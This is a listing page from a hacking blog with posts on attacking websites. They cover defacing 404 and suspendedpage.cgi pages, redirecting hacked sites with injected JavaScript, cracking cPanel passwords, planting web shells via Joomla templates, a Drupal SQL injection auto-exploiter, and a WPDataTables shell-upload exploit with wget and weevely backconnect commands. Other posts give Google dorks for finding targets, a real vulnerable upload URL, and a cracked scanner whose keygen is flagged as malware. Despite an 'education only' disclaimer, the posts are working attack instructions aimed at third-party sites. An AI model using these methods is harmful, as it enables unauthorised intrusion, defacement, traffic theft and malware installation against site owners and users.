Tampilkan postingan dengan label Web Application Vulnerability. Tampilkan semua postingan
Tampilkan postingan dengan label Web Application Vulnerability. Tampilkan semua postingan

Senin, 20 Juni 2016

How to Deface 404 pages Using Shell 2016

How to Deface 404 pages Using Shell: Hello guys so today we will be talking about How to Deface 404 pages Using Shell, means if you have defaced index.html and if you open any directory which is not present in the site you will get your defaced page for example I have defaced www.site.com/index.html and if I open www.site.com/blahblah I will get my deface page!

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

What are 404 Error Pages?


ok for those who don't know about 404 pages, let me tell you.. If you get 404 Error pages then it  means that the file like you are looking for does not exists on the website! for example, I look for
www.site.com/blahblah now the file name or directory blahblah is not there on the website so it will show 404 error.

Common Names for 404 Error pages:
  • 404 error page not found
  • 404 error file not found
  • 404 invalid directory etc...
  • Not Found

How to Deface 404 pages Using Shell


Advantages of 404 pages in website hacking:

If someone try to find or access your shell by guessing like (c99.php, r57.php etc), if not found then it will show your custom 404 error page on Not found Link. In most of the cases we usually upload our deface page as index.html or anyname.html on hacked websites.and we can see our deface page on That custom link only where we uploaded our deface page 
For example : site.com/index.html, site.com/r00t.html site.com/r00t.php

by adding deface page's code in 404 page you can see your deface page on every link 
like site.com/xyz.php site.com/x.html site.com/xyz/, 

How to Deface 404 pages Using Shell

All you have to do is just copy and paste the code given below in a notepad(or you can use your deface page's code)  and save as 404.shtml and upload to public_html/ directory using shell..
now check any error link !! :) simple

Code for 404 Pages :
<style type="text/css">body { background-color: #000;}</style>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikpIAq_RRZIFZEPGhmZgMNHbpyON7v5hyRL_EXh6CSBx9QeLgOC6P2lUQQxMBGD4zuUehd7y8rKKGseyxjffbaEktYXPAObfMUw6n6FinvrUHfD_yqbXwQLGd7mF0T_YvJswCCII9U7C4/s1600/935389_169429133221158_1802310639_n.jpg" width="1198" height="765" />
(replace image link with your own image in this code)
Read more

How to Redirect a Hacked Website to your Website[SEO]

How to Redirect a Hacked Website to your Website[SEO]: Hello guys so today we will discuss about How to Redirect a Hacked Website to your Website[SEO]. This might be very helpful to you because when you are facing downtime or when you have low traffic on Website/Blog,then you can get or steal the traffic of the website's which you have hacked!All you have to do is Just to redirect the hacked website on your Main website.How to Redirect a Website to other Website

Today we will discuss about a blackhar SEO method to redirect a website(hacked by you) to your own website and to steal all the traffic of the hacked site.


How To Redirect Hacked Website to your Website[SEO]


So here we are talking about How to Redirect a Hacked Website to your own Website, How to Redirect a Website to other Website, How to Redirect a Website to your own Website

NOTE: for this you need to access to the shell uploaded on you desired website which you want to redirect to your site


To Redirect a Hacked Website to your own Website, open your deface in Notepad And paste this code just after </title>
Code :- 
</SCRIPT><script> delayRedirect('http://www.thehackerstore.net/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script> 

(replace http://www.thehackerstore.net/ with your own website)

Now save The Deface page and Upload on hacked website :) The website will be redirect on your website ! :)

How To Add A Pop Up and Open Your website in a New window

If you want to Open Your website In a New Window (Pop-up) Paste this code
<script language="javascript">
window.open('http://www.thehackerstore.net/','','width=700,height=600')
</script> after  </title> 

So, that's it guys and trust me its the best method to get traffic on your website. If you are having any queries you can ask them below in comment section :)

Web Design in Vijayawada
Read more

HOW TO SPOOF YOUR MAC ADDRESS (ANONYMITY) 2016


HOW TO SPOOF YOUR MAC ADDRESS (ANONYMITY)

SPOOFING YOUR MAC ADDRESS (ANONYMITY), how to spoof your mac address, spoofing your mac address,spoof your mac address, change your mac address.

MAC (Media Access Control) is a number that identifies your network adapter or adapters for connecting to the internet. To remain exceptionally anonymous you must change your MAC IP address. By changing your macintosh address you can:
  • Staying Anonymous 
  • Bypass Mac Filters 
  • Mac Authentication 
spoof your mac address, how to spoof your mac address, trick to spoof your mac address, how to change your mac address.

#1 Staying Anonymous :


The first and the chief thing by ridiculing your macintosh location is with the end goal of namelessness. Your macintosh location can be seen by any individual on your neighborhood (LAN) or besides in the event that you are associated with a WiFi system any individual can see your macintosh address by simply running a basic sweep either from windows or Linux. A basic sample of this is to simply utilize the order from Linux as

airodump-ng (mon0 = your wifi interface) 



The BSSID's recorded over allude's to the macintosh addresses for different systems accessible in your reach. By simply running a straightforward sweep we discover the different BSSID's accessible. Programmers may attempted to misuse your system in the event that they figured out your macintosh address and can utilize the web as being "you" That's the reason you have to change your MAC address.

#2 Bypassing MAC Filters :


If you ever need to unite with an open WiFi system with the end goal of staying unknown however things didn't turned out really well, may be the WiFi proprietor is utilizing a MAC channel. Macintosh channel implies just permitting those clients to interface which have a particular MAC address. By changing your MAC location to that particular location which is joined you can associate with a system yet first by de validating the present client.

#3 MAC Authentication : 


Some ISP (Internet Service Provide) might just permit you to interface with a MAC address in the event that you have a particular location. So changing your location dependably helps for this situation.

HOW TO CHANGE YOUR MAC ADDRESS

1. Smac ( For Windows) :- It is an effective MAC changer that has been around for a considerable length of time. It is anything but difficult to use with any equipment. You should be a "specialist" to utilize this. It totally parodies your Mac address. Rather than utilizing Smac there are numerous product's accessible which you can use to change your PC's macintosh location thus on stay unknown on the web.

You can download it by clicking Here



2. Macintosh Changer (Linux) :- Mac-changer is a free accessible apparatus which is utilized for changing the Mac address in a Linux machine. What you have to do is select your web interface and run the summon and its basically done.



The above screenshot is taken from Backtrack and it is unreservedly accessible in Backtrack and numerous other higher adaptations.

sudo well-suited get introduce macchanger-gtk 


Thanks for Reading :)
Read more

How to deface suspendedpage.cgi

How to deface suspendedpage.cgi: Today in this article we will discuss about How to deface suspendedpage.cgi. You might have landed to this suspendedpage.cgi page by mistake and ignored it but we can deface it.  Its very simple How to deface suspendedpage.cgi all you have to do is to follow the steps given below :)

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.



How to deface suspendedpage.cgi


How to deface suspendedpage.cgi. So we are discussing here about to deface suspendedpage.cgi. all you have to do is uts to convert your deface page's html coding to .cgi script and upload it in /cgi-bin/ or /cgi-sys/ directories :) . Just follow the steps :)


How to deface suspendedpage.cgi


How to deface suspendedpage.cgi. Just follow the simple steps given below How to deface suspendedpage.cgi :)
  • Go HERE and convert your deface.html to .cgi script :)
  • Save it as suspendedpage.cgi
  • And finally upload it in the /cgi-bin/ or /cgi-sys/ directories :)
  • When you have uploded it, change the chmod from suspendedpage.cgi to 755.
  • Save and see the result :D
    Example: www.site.com/cgi-sys/suspendedpage.cgi
  • BOOM!! You have DEFACED suspendedpage.cgi page :D :D

So that's it If you have any doubts feel free to ask :)

Read more

How to Crack Cpanels 2016

How to Crack Cpanels  : So today In this article we will discuss about How to Crack Cpanels Easily . I will explain you each and every steps :) ok lets have a look what what are the things we will need to crack cpanels :) How to Crack Cpanels Easily..2016

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.


Thing you need to Crack Cpanels Easily:
  • Shelled Site                                 
  • Cpanel Cracker: Download Here
  • List of Username and Password  
crack cpanel, how to crack cpanel,easiest way to crack cpanel, how to crack cpanel password, cracking cpanels password, crack cpanels from server, hack cpanels, cpanels hack, cpanels cracking

How to Crack Cpanels Easily 


How to Crack Cpanels Easily . Now lets look at the procedure. just follow the simple steps How to Crack Cpanels Easily .
  • Upload your cpanel cracker cp.php(Download Here) into your shell. 
  • Scroll down, click on User to get all the usernames of Cpanel


  • Copy the Username and Password from your dictionary and paste in the User and Pass column


  • Click start and wait them cracked. :D
  • You will get the result in the next page.

  • You can login at into the Cpanel at www.example.com:2082 :)
So thats it so simple if you have any doubts feel free to comment below :) :)
Read more

How To Upload Shell in Joomla Via Admin Panel

Hello Guys! Successfully Hacked into Joomla Admin Panel? Not sure how to upload shell in jooma via admin panel? well your are at right place because today we are talking about How To Upload Shell in Joomla Via Admin Panel. Today I'm going t teach you How To Upload Shell in Joomla Via Admin Panel. Its pretty simple! just follow the following steps given below  :) :-

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have an access to joomla admin. Now just login into it..



Once you Login you see the below screen.



Then look for Extensions and in that Template Manager.



Once you click on that you will see all the templates installed on that site.



See the marking in red it has the star. It means its the default template used by the sites currently. Select any of the template like it did beez in green.



Once you click on beez you will see the following screen. now just click on edit html



Once you click on edit html you will see the following screen



see the red part /templates/beez/index.php that is the path of your shell

Now just paste your shell code over their and save it




Once you click on save. it will take you to page were it will show you Template source saved. you work is done..

Once that is done you can access your shell. Path of the shell would be

www.site.com/templates/beez/index.php

Read more

Sabtu, 06 Februari 2016

Acunetix Web Vulnerability Scanner Latest CRACKEDDD !!!

Acunetix Web Vulnerability Scanner Latest

Version 10
                                                                                                                                                               
Readers today I am making Acunetix available the best web application scanner BE SECURED WITH ACUNETIX.
(AWVS) Acunetix Web Vulnerability Scanner the #1 listed in web application security.
With the uptake of cloud computing and the advancements in browser technology, web applications and web services have become a core component of countless business processes, and therefore a lucrative target for attackers. Over 50 percent of internet sites and web applications however, contain vulnerabilities that can lead to the theft of sensitive corporate data, credit cards, customer information and Your personal data (P.I.I.). 



Link with Keygen Acunetix included :

"It will be labelled as infected because it is a false positive "

After Installing 
DONT RUN 
Paste the keygen in the root (C:\Program Files (x86)\Acunetix\Web Vulnerability Scanner 10)
Run Keygen
It will activate 
If theres a pop up saying register first time it runs just press cancel
Thats All



Read more

Kamis, 22 Januari 2015

Drupal 7.xx SQL Injection Exploit

Drupal 7.xx SQL Injection Vulnerability
This exploit add a new Drupal administrator account (preserving original) via Sql Injection.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements:-
1). Python
         OR

In this tutorial, i'm just going to show you how to exploit using our Drupal Auto Exploiter since it is fast and easy.

Steps:-
1). Download the auto exploiter from the given link
2). Extract and run it
3).  Find your target on Google by using this dork
intext:"powered by drupal"
4). Choose any site, paste it in exploiter and click EXPLOIT
5). If the site is vulnerable, you will see something like this

6). Click the given login URL and login with the username and password given.

Having Problems?
Feel free to read the Frequent Asked Questions(FAQs) by clicking on HELP


Downloads:-



Read more

Wordpress Exploit: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass 

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.


Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit
        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt
    2- Change to executable Python extension
        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py
    3- Find Vulnerable Target using dork
        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"
    4- Open cmd/terminal and run exploit wptable.py
        python wpdatatables_shell_up.py -t targetsite.com -f shell.php
    5- Shell Upload to
        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable:-

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php
        mv index.php indexBAK.php
    5- Import Deface Script
        wget http://yourhosting.com/index.txt -O index.php
Read more

Sabtu, 19 Juli 2014

Bypass Disabled Upload Option And Upload Shell

Bypass Disabled Upload Option And Upload ShellHello Readers! since I got many messages from people asking that they were facing many problems in shell uploading. So I have decided to write about this. Its just an example for shell uploading..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Find a vulnerable sites that has Disable Upload Option. Example
http://centralplaza.co.th/chiangrai/photoupload.asp
You can also use google dork for finding more:-
inurl:/photoupload.asp



2). Now right click on the page and click on Inspect Element and find the code for that upload button to enable to disabled upload button :P


3). Now Change the text disabled="disabled" to enabled="enabled" and press Enter..
Do the same for SUBMIT button and finally upload your shell.php.jpg ..

4). Now to find you uploaded shell simple click on View All Photos .. an get you Shell :)



Enjoy..!!
Read more